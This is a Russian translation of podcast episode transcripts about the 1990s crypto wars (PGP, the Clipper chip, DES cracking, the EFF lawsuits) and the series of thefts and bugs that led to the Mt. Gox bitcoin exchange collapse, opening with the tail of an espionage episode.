Айра: В данном случае все исследования и разработки могли легко попасть в руки Китая, по моим самым печальным прогнозам, эти данные уже были у шпионов.

Ведущий: Годы спустя компания назначает нового генерального директора, и Айра спрашивает его об операции китайской разведки через дорогу. Ей сообщили, что там провели уже дюжину арестов.

Ведущий: ФБР смогло пресечь эту операцию китайской разведки. Это могло бы продолжаться годами, если бы не Айра и её команда. Команда настолько хорошая, что они могут сливаться с окружением в любой точке мира, растворяясь в толпе, собирая информацию. Не ведут себя как Джеймс Бонд, не устраивают стрельбу и не устраивают сцен, а вместо этого ведут себя более скрытно и могут быть теми, кто просит у вас невинно прикурить в баре. Возможно, в следующий раз, когда вы выйдете на улицу, вы сможете начать искать что-нибудь странное. Кто-то может вести себя слишком мило, но при этом задавать много вопросов, или вы можете заметить того парня в углу китайского ресторана, который ест в одиночестве с русским акцентом. Шпионы среди нас.

https://telegra.ph/EHpizod-10-vstret...j-shpion-04-06

Эпизод 11: История первых крипто-войн
Вступить в наш чат

В 1990-х Интернет начал формироваться. Но у правительства США были строгие законы, регулирующие, какой тип криптографии разрешено использовать в Интернете. Несколько смелых людей выступили против правительства во имя гражданских прав и добились права использовать надежное шифрование. Узнайте об их битве и том, через что им пришлось пройти, чтобы добиться безопасности для всех нас.https://i.gyazo.com/0d5772faf98dca40dd4e9dafa5b30067.png

Синди: Меня зовут Синди Кон, и я исполнительный директор Electronic Frontier Foundation.

Ведущий: EFF - это некоммерческая группа по защите цифровых прав. Она помогает защитить ваши гражданские свободы в Интернете. Синди работает в EFF уже более двадцати лет, и, как мы скоро узнаем, она сыграла решающую роль в Крипто-войнах. Но прежде чем мы перейдем к ее роли в этом, нам нужно взглянуть на историю криптографии.

Синди: Криптография использовалась военными для защиты своих планов и обмена информацией, скажем, между генералами и линией фронта еще со времен Юлия Цезаря. У Цезаря был шифр, которым они пользовались. Во время Второй мировой войны было несколько замечательных историй о том, как возможность взломать немецкий код, машину enigma, которую они использовали для кодирования, оказала огромное влияние на способность союзников выиграть войну. Есть замечательные истории о том, как взломщики кодов в Блетчли-Парке взломали немецкий код, а также были действительно успешные попытки взломать японские коды. Я думаю, многие люди вполне достоверно скажут, что способность союзников взламывать шифровальные коды во многом способствовала тому, что мы действительно выиграли войну.

Ведущий: В эпоху холодной войны, где-то в 1970-х или 80-х годах, Госдепартамент США добавил криптографию в Список боеприпасов.

Синди: Шифрование выполняет две важных функции: оно одновременно сохраняет конфиденциальность и обеспечивает безопасность. Это стало одной из действительно полезных технологий, которые мы должны были иметь в наличии, если мы хотели иметь Интернет, который действительно работал бы для всех. Правительство создало стандарт шифрования, который позволяло людям использовать, чтобы могло быть хотя бы какое-то шифрование, но оно было очень, очень слабым.

Ведущий: Этот стандарт был известен как DES. С его помощью вы можете зашифровать свои данные или сообщение, и любой, кто прочитает зашифрованное сообщение, не сможет понять, что в нем написано. Понимал только тот, у кого был ключ. Однако этот стандарт со временем устарел.

Синди: К 90-м годам DES явно перестал быть хорошей системой безопасности. Правительство притворялось, что всё в порядке и надеялись, что никто не заметит лазеек. Но, конечно, люди это заметили.

Ведущий: Правительство знало, что 40-битное шифрование DES не очень надежное, но настаивало, чтобы мы все равно его использовали. Предприятия и банки оцифровывали свои данные, и необходимость в шифровании всех этих данных постепенно становилась все более и более важной.

Синди: Люди участвовали в протестах. Мы знаем, что правительство США традиционно шпионило за людьми, участвующими в политических протестах. Мы знаем, что они шпионили за Мартином Лютером Кингом, Джоном Ленноном, мы знаем, что они шпионили за всем движением за "гражданские права".

Ведущий: Вот почему был запущен PGP. Фил Циммерманн, инженер-программист, разработал гораздо более безопасный способ общения под названием PGP, который означал довольно хорошую конфиденциальность. Он помогал правозащитникам использовать его. Он разместил свой PGP-код на FTP-сервере, чтобы любой мог его скачать и использовать. Хотя Фил сказал, что он не распространял это за пределами США, в конце концов это нашло свой путь по другую сторону границ США. Поскольку криптография считалась оружием, Таможенная служба США расследовала дело Фила за нарушение Закона о контроле за экспортом оружия. Это было бы таким же нарушением, если бы кто-то экспортировал ракеты Stinger за пределы США без разрешения на оружие.

Предприятия начали использовать PGP как форму передачи коммерческой тайны и конфиденциальных данных. Внутреннее использование PGP было законным до тех пор, пока шифрование не пересекало границу США.

В течение следующих нескольких лет Фила будут постоянно допрашивать за распространение его метода шифрования по всему миру. Правительство возбудило против него дело за нарушение "Закона о контроле за экспортом оружия". Битва между Филом Циммерманом и правительством США была первой битвой Крипто-войн. Пользователи Интернета, охранные компании и банки - все они начали запрашивать все более и более высокие уровни шифрования для использования людьми.

Ведущий: В 1993 году Брюс Шнайер опубликовал книгу под названием "Прикладная криптография". В этой книге описываются различные криптографические алгоритмы и способы их использования. Она даже содержит алгоритмы, которые не разрешалось использовать в Интернете. Инженер-электронщик по имени Фил Карн обратился в Госдепартамент США с просьбой предоставить для книги лицензию на производство товаров. Он хотел знать, может ли он легально переправить книгу через границу США. Поскольку нет никаких правил экспорта книг, ему было дано разрешение на вывоз книги. Затем Фил Карн взял несколько страниц из книги, в которой содержались некоторые криптографические алгоритмы, и поместил их на дискету. Затем он запросил товарную юрисдикцию для дискеты. Госдепартамент провел дискуссию с АНБ и отклонил запрос. Мы знаем, что у них была дискуссия с АНБ из-за записей, запрошенных в соответствии с "Законом о свободе информации" много лет спустя.

Поскольку шифрование было в электронной форме, теперь оно считалось регулируемым боеприпасом, и ему не разрешалось пересекать границы США в таком виде. Это вызвало довольно много споров. Книгу, содержащую математический алгоритм, можно отправить через границу, но дискету с тем же алгоритмом нельзя? Итак, Фил Карн подал в суд на Госдепартамент США. Он считал, что если данные, содержащиеся в книге, считаются защищенными в соответствии с Первой поправкой, то данные, содержащиеся на гибком диске, также должны быть защищены таким же образом. Как только Фил Циммерманн услышал об этом судебном процессе, он решил напечатать свой исходный код PGP в формате книги. Он даже позаботился о том, чтобы книгу было легко сканировать. Он тоже просил предоставить товарную юрисдикцию для его книги, но Госдепартамент теперь был более осведомлен о ситуации и не предоставил ему права экспортировать книгу, но на самом деле и не отказал ему. Госдепартамент просто некоторое время рассматривал этот запрос.

Издатель Фила Циммермана не стал дожидаться ответа: вместо этого они начали рассылать книгу, содержащую его PGP-код, по всему миру. Сообщество безопасности использовало это и в других направлениях, таких как алгоритмы печати на футболках, которые затем превратили бы футболку в регулируемый боеприпас, а когда что-то является таким регулируемым боеприпасом, вы даже не можете позволить иностранцам читать футболку. Простое ношение этой рубашки перед иностранцем нарушало "Закон о контроле за экспортом оружия".

Синди: Затем я создала команду с юристами EFF, подала иск против технологий шифрования. На самом деле было подано три судебных иска. Мы разобрались с одним делом под названием "Бернштейн против Министерство юстиции.

Ведущий: Другой криптограф по имени Дэн Бернштейн разрабатывал методы шифрования, которые превышали установленный предел. В 1995 году Бернштейн хотел написать о своем шифровании, выступить с докладами о нем и опубликовать исходный код в Интернете. Закон о контроле за экспортом оружия и Регулирование международной торговли и вооружений требовали, чтобы Бернштейн представил свои идеи о криптографии правительству для рассмотрения, что также требовало от него регистрации в качестве торговца оружием и подачи заявления на получение лицензии. Все это просто для того, чтобы опубликовать свои идеи о криптографии в Интернете. Бернштейн решил сразиться с Министерством юстиции США, и он получил помощь от EFF, в частности, от самой Синди Кон. EFF взяли своих лучших юристов, чтобы пойти и помочь Бернштейну.

Синди: Да, именно в этом и заключалась цель судебного процесса - убедиться, что люди могут публиковать информацию. Публикация в Интернете всегда является экспортом, потому что каждый в мире может видеть, что публикуется в Интернете. Мы хотели, чтобы люди могли публиковать и делиться надежным шифрованием в Интернете. Чтобы добиться этого, мы сделали следующее: мы утверждали, что компьютерные программы, компьютерный код являются защищенной речью в соответствии с Первой поправкой и что правительственные постановления об этой речи в форме Правил о перечне боеприпасов не соответствуют Первой поправке.

Ведущий: В течение следующего года Бернштейн, Синди и EFF боролись с Министерством юстиции США. В 1996 году профессор Кейс Вестерн Университета по имени Питер Юнгер также присоединился к битве. Он не только хотел опубликовать код в Интернете, но и хотел преподавать курс по криптографии. Но из-за того, что он включил криптографию в качестве темы своего урока, ему было запрещено принимать иностранных студентов в свой класс. Это привело к тому, что Юнгер также оспорил законы об экспорте.

Синди: Это дело происходило в Кливленде. Наше дело, дело EFF, рассматривалось в Калифорнии, а затем дело Фила Карна рассматривалось в Вашингтоне. Мы все трое работали вместе, чтобы попытаться убедиться, что мы оказываем как можно большее давление на правительство, насколько это возможно коллективно.

Ведущий: К этому моменту многие компании заявили о необходимости более надежного шифрования своих данных. Банки, в частности, просили правительство разрешить им использовать более надежный метод шифрования. Правительство США не разрешало использовать в Интернете шифрование длиной более 40 бит. Примерно в это же время AT & T создала телефон, который шифровал звонок. По сути, он создавал модемное соединение с одного конца на другой и оцифровывал голос, а затем выполнял шифрование данных DES. AT & T продала эти телефоны за 1400 долларов в середине 90-х годов. Правительство США взбесилось из-за этих телефонов. Они связались с AT & T и сказали, что у них есть лучшее решение. Правительство работало над новым способом электронного шифрования данных с использованием специализированного компьютерного микрочипа.

Шифрование было намного лучше обычного DES. Правительство назвало это чипом Clipper. Они разработали этот чип для всех, кто хотел использовать более надежное шифрование. Правительство настоятельно призвало AT & T использовать чип на своем телефоне. AT & T сначала колебалась, но правительство предложило купить кучу этих телефонов, если они добавят чип. AT & T добавила в телефон чип Clipper, и правительство США купило тонну этих телефонов, но в характеристиках чипа Clipper была одна довольно большая загвоздка. В чип Clipper был встроен запасной ключ, который позволял правительству расшифровывать любое сообщение, зашифрованное чипом. Правительство в основном позволяло людям использовать довольно надежный метод шифрования, но у них был ключ для взлома шифрования, если им это было нужно. Идея заключалась в том, что правительство будет единственным, у кого будет
https://i.gyazo.com/4c3eda1a5dfac54dd0651f1c05985cd9.png

Чип Clippеr
Синди: Парень по имени Мэтт Блейз, который сейчас является профессором компьютерных наук Пенсильванского университета, очень известный профессор компьютерных наук, продемонстрировал, что эти чипы Clipper действительно небезопасны.

Демонстрация недостатков чипа Clipper, которую сделал Мэтт Блейз, была действительно решающей в этом разговоре, потому что в конечном итоге это означало, что правительство отказалось от идеи чипа Clipper. Это был первый гвоздь в крышку гроба криптополитики правительства. Второе, что произошло, - это то, что мы начали выигрывать наш судебный процесс. Мы выиграли дело в Окружном суде, а затем также выиграли его в Апелляционном суде. В то же время в Конгрессе предпринимались усилия, которые продвигались немного медленнее. На администрацию также оказывалось прямое давление со стороны технологических компаний и Эла Гора, который хотел стать президентом после Клинтона и был довольно технически подкованным парнем. В конечном счете правительство решило, что они больше не собираются включать шифрование в Списке боеприпасов.

Ведущий: 15 ноября 1996 года Билл Клинтон подписал Исполнительный указ 13026, который исключил шифрование из Списка боеприпасов. Исполнительный указ также переместил тех, кто курирует шифрование, из Государственного департамента США в Министерство торговли США. Подписание Указа стало крупной победой активистов движения за гражданские права.

Синди: Правительство лицензировало только 40-битный DES. Они сказали, что у вас может быть любое шифрование, какое вы хотите, если оно 40-битное, что немного похоже на утверждение, что вы можете иметь всю необходимую безопасность, пока на вашей двери нет ничего, кроме действительно слабого замка. Становилось очевидным, что людям нужно более серьёзное шифрование, чем просто 40 бит.

Ведущий: Поскольку длина шифрования была ограничена всего 40 битами, это серьезно ограничивало степень безопасности наших компьютеров. Существовало множество доступных более сильных шифров, но в соответствии с правительственным постановлением их использование было запрещено. Компания под названием RSA Security спонсировала DES challenge. Они предложили награду любому, кто сможет взломать DES cypher. В 1997 году группа хакеров нашла способ взломать сообщение DES. Им потребовалось 39 дней, чтобы расшифровать сообщение. Криптографы думали, что этого будет достаточно, чтобы правительство разрешило людям использовать более надежное шифрование, но этого не произошло. NIST, Национальный институт стандартов и технологий, по-прежнему считал DES безопасным. Правительство преуменьшило значение проблемы, заявив, что 39 дней на взлом кода - это слишком большой срок, чтобы он представлял серьезную угрозу.

Синди: EFF создала инструмент под названием Deep Crack. Он мог взломать сообщение DES всего за 56 часов. Но, тем не менее, правительство не изменило своей позиции в отношении DES и по-прежнему продолжало поддерживать его. Через несколько месяцев после этого EFF и победители первого конкурса DES challenge объединились, чтобы разработать еще более быстрый способ взлома DES. Они смогли взломать сообщение всего за 22 часа.
https://i.imgur.com/EY4AiwF.png
Синди: Правительство продолжало притворяться, что на короле была одежда, когда мы указывали на то, что король голый. Мы только что продемонстрировали общественности то, что было давно известно частным лицам, а именно: любые плохие парни, имеющие доступ к действительно простым, готовым технологиям, могут создать что-то, что нарушит безопасность, на которую все эти финансовые учреждения полагались для защиты наших денег.

Ведущий: Это была последняя битва крипто-войны. Как только кто-то смог взломать сообщение DES менее чем за день, правительство США согласилось, что оно больше не является безопасным. Они выпустили новый шифр под названием Advanced Encryption Standard, или AES. AES использовал 120-битную мощность и намного превосходил 40-битный DES. Они также разрешили triple DES, который был более сильной версией DES. К 1999 году правительство США прекратило все судебные дела. Были разработаны новые, более надежные методы шифрования. К 2000 году правительство вообще перестало требовать лицензирования или ограничения длины ключей.

Теперь людям было разрешено шифровать свои сообщения с помощью такого надежного метода шифрования, какой они хотели. Предприятия смогли использовать самое современное шифрование для защиты своих транзакций и данных. Конечно, Фил Циммерманн мог бы опубликовать свой код в Интернете, а Питер Юнгер мог бы принять девять американских студентов в свой класс, который рассказывает о криптографии. К 2000 году первая серия Крипто-войн закончилась, что ознаменовало крупную победу наших гражданских прав. Теперь мы в большей безопасности, и благодаря этому наша конфиденциальность более защищена. Мы должны поблагодарить этих интернет-крипто-воинов за то, что они проложили путь к нашей конфиденциальности и безопасности.

Но эта история еще не закончена. Это всего лишь история первых Крипто-войн. Вскоре после этого правительство начало атаковать криптографию новыми способами, которые долгое время оставались совершенно незамеченными. Но это история для другого раза.
https://telegra.ph/EHpizod-11-Istoriya-pervyh-kripto-vojn-04-12

Эпизод 12: Почему нельзя хранить средства на биржах часть 1.
Вступить в наш чат
Репортер: Генеральный директор Mt. Gox опубликовал заявление впервые с тех пор, как была закрыта биткойн-биржа. Предполагается, что генеральный директор скрывался после сообщений о том, что, по оценкам, было украдено 744 000 биткоинов на сумму около 350 миллионов долларов. Говорят, что в настоящее время японские власти расследуют этот вопрос.

https://i.gyazo.com/82da83a10c903a91595df6925c4a8841.png

Ведущий: Что, если бы существовала денежная система, не привязанная к какой-либо конкретной стране? Что, если бы эта денежная система была одновременно анонимной, где вы не можете сказать, кому принадлежат деньги, и прозрачной, где любой может видеть каждую транзакцию? Что, если бы эта денежная система была полностью цифровой, где не было бы необходимости печатать банкноты или монеты? Есть такая денежная система, она называется Биткоин.

Впервые он появился в 2008 году, но в течение первых нескольких лет транзакций не было.

В 2010 году веб-программист по имени Джед Маккалеб заинтересовался Биткоином, и у него был старый домен под названием mtgox.com который изначально обозначал онлайн-биржу Magic the Gathering, но этот проект просуществовал всего несколько месяцев, прежде чем он отказался от него, поэтому он повторно использовал этот домен и использовал его для запуска первой биткойн-биржи под названием Mt. Gox в июле 2010 года. Быть первым на рынке новой технологии обычно означает, что вы собираетесь стать лидером рынка. Это, безусловно, имело место в случае с Mt. Gox. На протяжении всей жизни Mt. Gox это была доминирующая биткойн-биржа в мире. Даже когда существовало несколько других бирж, Mt. Gox по-прежнему обрабатывала 70 процентов всего биткоина. Они обрабатывали более 100 000 биткоинов в день, что значительно превысило бы 15 миллионов долларов США.

Mt. Gox был идеальным местом, если вы хотели купить или продать биткоин. Но все это резко прекратилось в 2014 году. Внезапно, без предупреждения, сайт Mt. Gox отключился. Mt. Gox содержал 750 000 биткоинов, когда они закрылись. Это семь процентов всех биткоинов в мире, которые стоили более 450 миллионов долларов США. В заявлении Mt. Gox изначально говорилось, что биткоины были украдены. Так что же произошло?

Ким: Меня зовут Ким Нильссон. На самом деле я всего лишь консультант по программному обеспечению. В основном я занимаюсь разработкой программного обеспечения, но я также занимаюсь анализом блокчейна или, как я иногда называю это, археологией блокчейна, поскольку в основном изучаю исторические материалы.

Ведущий: Блокчейн - это публичная запись, в которой хранятся все биткойн-транзакции. Существует более 300 000 транзакций в день, и каждая из них хранится таким образом, чтобы любой желающий мог просмотреть их все. Биткоины хранятся в виртуальных кошельках. Мы можем видеть, сколько биткойнов перемещается с одного кошелька на другой, но мы не можем определить, кому принадлежит этот кошелек. Эта часть анонимна.

Ким: Да, я был в значительной степени клиентом Mt. Gox. Я просто использовал их для торговли и еще много чего. Я на самом деле не наблюдал за ними активно, пока они были наверху или что-то в этом роде, так что я был немного застигнут врасплох, когда Mt. Gox просто рухнула. Я не потерял безумную сумму денег, но воспринял это не особенно хорошо. Я чувствовал, что кто-то должен расследовать это.

Я продолжал с большим интересом наблюдать за развитием ситуации. Начали происходить утечки некоторых внутренних данных Mt. Gox. Вроде как с этого все и началось. Я немного объединил усилия с некоторыми другими ребятами, и мы попытались собрать как можно больше данных, чтобы попытаться разобраться в этом.

Ведущий: В течение последних лет Ким изучал блокчейн и пытался лично собрать воедино то, что произошло с Mt. Gox. Он пытался подсчитать, сколько денег поступило, сколько денег ушло, и сопоставить эти цифры. Это непростая задача. Объем данных, содержащих все эти транзакции, составляет почти 40 гигабайт, и в них были сотни миллионов записей. Он пытался просмотреть их все, чтобы попытаться понять, что случилось с Mt. Gox. Он потратил много времени на анализ этих данных и нашел блестящие способы ускорить их поиск. Он также обращался непосредственно к генеральному директору Mt. Gox за дополнительной информацией. Помогло и то, что они оба жили в Японии.

Ким: Mt. Gox была основана как биткойн-биржа в 2010 году. Ей, вероятно, в то время управлял один человек, Джед Маккалеб. Он был веб-разработчиком и лично создал сайт с нуля. В январе 2011 года было совершено две транзакции, связанных с интеграцией Mt. Gox вывода средств Liberty Reserve.

Ведущий: Liberty Reserve была компанией, которую Mt. Gox использовала для перевода денег от одного человека к другому. Это был сервис, привязанный к их серверной части, который позволял перемещать деньги, но Джед допустил несколько ошибок при добавлении сервиса на свой сайт.

Ким: Пользователь просто сможет ввести XML для переопределения параметров в запросе API, отправленном в Liberty Reserve, чтобы получить больше денег, чем они фактически сняли с Mt. Gox.

Ведущий: Таким образом, хакеры выводили больше, чем им должно было быть разрешено выводить, используя этот плохо реализованный код. Но это была не единственная проблема Джеда с Liberty Reserve. Пользователи вводят, сколько денег они хотят вывести, но…

Ким: Код забыл проверить наличие отрицательных входных данных.

Ведущий: Это привело к странным результатам, позволив пользователям снимать деньги, которых у них не было. Джед обнаружил эти ошибки и исправил их, но это было только после того, как он уже потерял 50 000 долларов. Примерно в то же время Джед Маккалеб и Марк Карпелес начали общаться насчёт этого. Джед понимал, что сайт требует больше времени, чем он может вложить в него. Затем Марк проявил интерес к тому, чтобы забрать Mt. Gox у Джеда. Марк был веб-программистом из Франции, но недавно переехал в Токио, Япония, где находилась Mt. Gox.

https://telegra.ph/EHpizod-11-Istori...pto-vojn-04-12

Эпизод 12: Почему нельзя хранить средства на биржах часть 2.

Вступить в наш чат

Репортер: Генеральный директор Mt. Gox опубликовал заявление впервые с тех пор, как была закрыта биткойн-биржа. Предполагается, что генеральный директор скрывался после сообщений о том, что, по оценкам, было украдено 744 000 биткоинов на сумму около 350 миллионов долларов. Говорят, что в настоящее время японские власти расследуют этот вопрос.

https://i.gyazo.com/48e6f661ada32da2450e00db207ac285.png

Ким: Джед фактически почти отдал её Марку Карпелесу по очень выгодной цене и продал почти без предоплаты и, по-моему, просто получил долю дохода в течение следующих шести месяцев.

Ведущий: Но как раз перед передачей права собственности Марку с Mt. Gox случилось нечто ужасное. Кто-то взломал серверы Mt. Gox и украл файл hot wallet. Горячий кошелек - это биткоин-кошелек Mt. Gox, используемый для проведения ежедневных операционных сделок. Это отличается от холодного кошелька, который хранился не на серверах Mt. Gox, а в другом месте, в гораздо более безопасном месте. Вор украл горячий кошелек, а затем перевел все биткоины, которые были в нем, на свой собственный кошелек.

Ким: Это было около 80 000 биткоинов, которые исчезли и на самом деле все еще остаются нетронутыми в блокчейне по сей день. Вполне возможно, что они были случайно уничтожены или что-то в этом роде. Поскольку эти 80 000 биткоинов были украдены, на данный момент, конечно, уже существовала нехватка средств. Технически Mt. Gox уже была неплатежеспособна, как только Марк Карпелес взял ее в свои руки. Я не думаю, что Mt. Gox действительно когда-либо был платежеспособным ни на мгновение, пока он существовал при Марке Карпелесе.

Ведущий: То есть, если бы все пользователи Mt. Gox попытались вывести все свои биткоины с биржи, их не хватило бы на всех.

Ким: Уже к тому времени, когда Mt. Gox был продан несколько месяцев спустя, пропало много денег. Так что, можно сказать, начало под его руководством было немного неудачным.

Ведущий: Марк Карпелес управлял Mt. Gox из Токио, Япония. Теперь вся собственность переходит к нему и под его управлением проходит несколько месяцев. Марк был в процессе выяснения того, где следует хранить биткоины Mt. Gox. У него были некоторые на серверах Mt. Gox в виде горячего кошелька, и у него были некоторые в безопасном автономном месте, которое является холодным кошельком, но у него также были некоторые на его персональном компьютере.

Ким: За это время, похоже, кто-то смог проникнуть в собственный компьютер Марка, который в данный конкретный момент времени, по-видимому, был совершенно незащищен. В то время он, к сожалению, хранил 300 000 биткоинов с Mt. Gox на своей собственной незащищенной машине, и вор просто шарил нашел их и забрал. Очевидно, что это огромное количество потерянных биткоинов, но это никогда не привлекало внимания широкой общественности, потому что на самом деле вор, как оказалось, занервничал и предложил вернуть все биткоины в обмен на небольшую плату за хранение.

Ведущий: Вор сохранил 3000 биткоинов и отдал оставшиеся 297 000 обратно Марку.

Ким: Вероятно, если я рискну предположить, они предложили вернуть монеты, потому что не были особенно осторожны. Я не думаю, что это был какой-то мастер-хакер. Если бы я был на его месте, я, вероятно, был бы удивлен, что это вообще сработало. Предположительно, сделка в то время заключалась в том, что они вернули монеты в обмен на то, что его не будут привлекать к ответственности.

Ведущий: Проходит еще один месяц. Июнь 2011 года. Марк управлял Mt. Gox всего около трех месяцев.

Ким: В какой-то момент кто-то снова проник в систему Mt. Gox. Вероятно, они смогли получить небольшой дамп базы данных таблицы пользователя, который содержал учетные записи, хэши их паролей и все остальное. Тот, кто украл этот небольшой дамп базы данных, также смог взломать довольно много паролей, включая пароль к собственной учетной записи администратора Джеда. Отчасти наличие учетной записи администратора на Mt. Gox означало, что у вас был доступ к небольшой отдельной странице, где вы могли просматривать задачи администратора, такие как управление балансами счетов и тому подобное. Тот, кто ввязался в это, хорошо использовал эту маленькую функцию и начал добавлять сумасшедшие суммы биткоинов на новые учетные записи.

Ведущий: Хакер создавал биткойны из воздуха и продавал их так быстро, как только мог. В то время биткойн стоил около 17 долларов. Этот хакер продал так много биткоинов, что цена упала до одного цента за штуку. Некоторые люди покупали тысячи биткоинов по этой цене. Рынок сошел с ума и достиг самого дна. Затем вор выкупил дешевый биткоин и попытался переместить биткоин на другой адрес, но Марк Карпелес увидел, что происходит сбой, и отключил серверы. Он знал, что что-то было не так, и провел расследование. Он даже получил помощь от других, чтобы разобраться в ситуации. Mt. Gox оставался отключенным в течение нескольких дней. В конце концов они выяснили, как хакер проник внутрь и обрушил рынок, поэтому Марк откатил систему, чтобы отменить все сделки во время сбоя. Mt. Gox вернулся в сеть с восстановленной ценой до 17 долларов за биткоин, но хакер не остался совсем с пустыми руками.

Ким: Он также смог вывести несколько реальных биткоинов, увеличив балансы, обменяв их и просто попытавшись вывести. Таким образом, он получил около двух тысяч биткоинов.

Ведущий: Проходит еще пара месяцев, и Марк собирается расширить Mt. Gox, чтобы иметь возможность вести бизнес в Европе.

Ким: В конце лета 2011 года в Польше была другая биржа под названием Bitomat, которая случайно уничтожила их собственные биткойн-активы. Я думаю, что у них был свой кошелек на виртуальной машине, которая случайно стерла его или что-то в этом роде. Это уничтожило 17 000 биткоинов. На данный момент Mt. Gox вроде как хотела расшириться и получить местные лицензии и все такое, чтобы работать на местных рынках. Они пытались закрепиться в Европе. Марк рассматривал это как шанс попасть в Европу, приобретя Bitomat и любые другие регистрации компаний, которые у них были, в основном в обмен на покрытие этого долга. Mt. Gox забрала себе весь Bitomat, включая 17 000 биткоинов в клиентских активах.

Ведущий: На тот момент Марк управлял Mt. Gox всего около пяти месяцев, и ему уже не хватает 50 000 долларов наличными и 100 000 биткоинов. В то время как навыки Марка были в основном связаны с программированием, он верил, что Mt. Gox можно изменить и превратить в очень прибыльную компанию. У него были все намерения добиться успеха. Он просто был немного не в себе. Не проходит и месяца, как происходит еще одно нарушение.

Ким: Да, еще один инцидент, когда кто-то, похоже, проник в систему. Они получили доступ к базе данных. Напомним, что июньский взлом также был связан с получением информации из базы данных. Однако на этот раз похоже, что злоумышленник также имеет правильный доступ к базе данных, что он может вносить в нее изменения напрямую. Хакер изменял баланс счетов и мог удалять учетные записи. Таким образом он тоже пытался замести свои следы. Из-за этого этот инцидент немного сложнее отследить, потому что все улики, похоже, были стерты. Я восстановил некоторые из них, в основном набросав пробелы, где должны были быть журналы, но их нет, или в базе данных есть потерянные записи, которые предполагают, что что-то было удалено и еще много чего. Вероятно, по самым лучшим оценкам, с Mt. Gox было изъято что-то чуть меньше 80 000 биткоинов.

Ведущий: Марк обнаружил это нарушение только после того, как биткоины уже были переведены с Mt. Gox, поэтому он не смог предотвратить эту кражу. Теперь у Gox не хватало почти 200 000 биткоинов. Уже в следующем месяце происходит еще одно нарушение, и на этот раз самое крупное из всех.

Ким: Горячий кошелек wallet.dat был украден кем-то, у кого был доступ к системе.

Ведущий: В очередной раз хакер взломал сервер Mt. Gox и украл биткоин-кошелек. Вор быстро перевел биткоин в свой собственный кошелек, но поскольку он контролировали основной горячий кошелек от Mt. Gox, любые новые депозиты в этот кошелек вор также сможет забрать. Долгое время Mt. Gox не обнаруживал никакой подобной активности почти целых два года.

Ведущий: К тому времени, когда он был наконец обнаружен и остановлен, вор смог выкачать 650 000 биткоинов с Mt. Gox.

Возможно, вам интересно, почему Марк не зашифровал кошелек? По иронии судьбы, функция шифрования биткойн-кошельков была выпущена через несколько недель после того, как произошла кража. В то время просто не существовало технологии для шифрования биткойн-кошельков. Вы также можете задаться вопросом, почему Mt. Gox стал мишенью для стольких атак.

Ким: С помощью биткоина и других криптовалют вы действительно можете украсть реальные деньги из цифровых систем. Теперь хакерам гораздо выгоднее атаковать ваши системы.

Ведущий: Несмотря на то, что к этому времени Mt. Gox потерял более 800 000 биткоинов, проблемы на этом не закончились. Еще одна ошибка в кодовой базе Mt. Gox привела к проблеме с обработкой транзакций.

Ким: Mt. Gox ошибочно идентифицировала эти транзакции как ввод новых биткоинов в учетные записи пользователей. Это было чуть меньше пятидесяти аккаунтов; они получили бесплатные биткоины в общей сложности на сумму около 45 000 биткоинов.

Ведущий: Туда ушло еще 45 000 биткоинов. В октябре 2011 года Марк Карпелес внедрил в Mt. Gox новую систему кошельков, которую он сам запрограммировал в попытке обеспечить более безопасный сервис, но ближе к концу 2011 года в его новой системе кошельков произошла ошибка программирования.

Ким: Это тот случай, когда у него действительно была ошибка в коде. Это означало, что ряд операций по снятию средств фактически отправляли биткоины на неизрасходованные адреса, что равносильно уничтожению биткоинов. Было потеряно около 2500 биткоинов.

С момента добавления нового программного обеспечения кошелька на Mt. Gox больше не было краж или взломов. Похоже, его улучшенная система безопасности сработала. Но Марк знал, что ему не хватает так много биткоинов, а Mt. Gox неплатежеспособен. Он пытался сохранить все эти нарушения и кражи в тайне и скрыть от общественности. Он не хотел портить репутацию Mt. Gox как лидера биткойн-бирж, поэтому старался держать эти нарушения в секрете. В 2012 году у Марка и Mt. Gox все шло хорошо. Никаких существенных нарушений не произошло, никаких серьезных программных ошибок, которые привели бы к потере Биткоина, и Mt. Gox продолжала доминировать на рынке как крупнейшая биткоин-биржа. Казалось, что Марк, наконец, взял ситуацию под контроль и медленно возмещал свои потери.

К середине 2013 года Mt. Gox обрабатывала 70 процентов мировых биткойн-сделок, что составляло около 150 000 биткойнов в день. Несмотря на то, что это был лидер биткойн-бирж, на Mt. Gox работало не так уж много сотрудников. Марк много программировал сам, но ему помогали несколько других разработчиков. Неясно, думал ли Марк, что справится с этим сам, или ему было трудно доверять другим, или, может быть, у него не было денег, чтобы нанять персонал.

В 2013 году Mt. Gox захотела расширить свою деятельность в США, поэтому согласилась использовать компанию под названием CoinLab для обработки всех североамериканских транзакций. Mt. Gox дала им пять миллионов долларов для начала, но по какой-то причине эта сделка сорвалась, и CoinLab подала иск против Mt. Gox из-за нарушения контракта. CoinLab сохранили у себя пять миллионов долларов, которые им дала Mt. Gox. Я полагаю, что этот судебный процесс продолжается и сегодня. Позже, летом 2013 года, Министерство внутренней безопасности США выдало ордер на арест денег с Mt. Gox. Они нарушили закон о том, что действовали в качестве незарегистрированного отправителя денег в США. В общей сложности DHS изъяла у Mt. Gox пять миллионов долларов. Также было обнаружено, что Марк запускал торгового бота.

Ким: Я не знаю, у кого была первоначальная идея. Произошла утечка электронного письма, в котором Марк и Джед обсуждают это, и Джед, среди прочего, предполагает, что, возможно, вы можете совершать сделки на своей собственной бирже, чтобы перекладывать эту ответственность между биткоинами и фиатными деньгами как способ вернуть средства, если вы в принципе можете торговать убытками. Конечно, требуется, чтобы вы были трейдером, который может получать надежную прибыль, а Марк, похоже, не был трейдером, способным получать прибыль. Во всяком случае, он, похоже, купил дорого, а продал дешево.

Ведущий: Этот торговый бот, которым он управлял, назывался Willy Bot, и есть статья, в которой это подробно объясняется. Однако в то время, когда вышла статья, это были всего лишь предположения. Но предположение оказалось верным.

Ким: Марк внедрил этот внутренний торговый механизм, и можно было получить довольно точную информацию о том, какая работа была выполнена или нет. Похоже, он не стирал никаких журналов или что-то в этом роде.

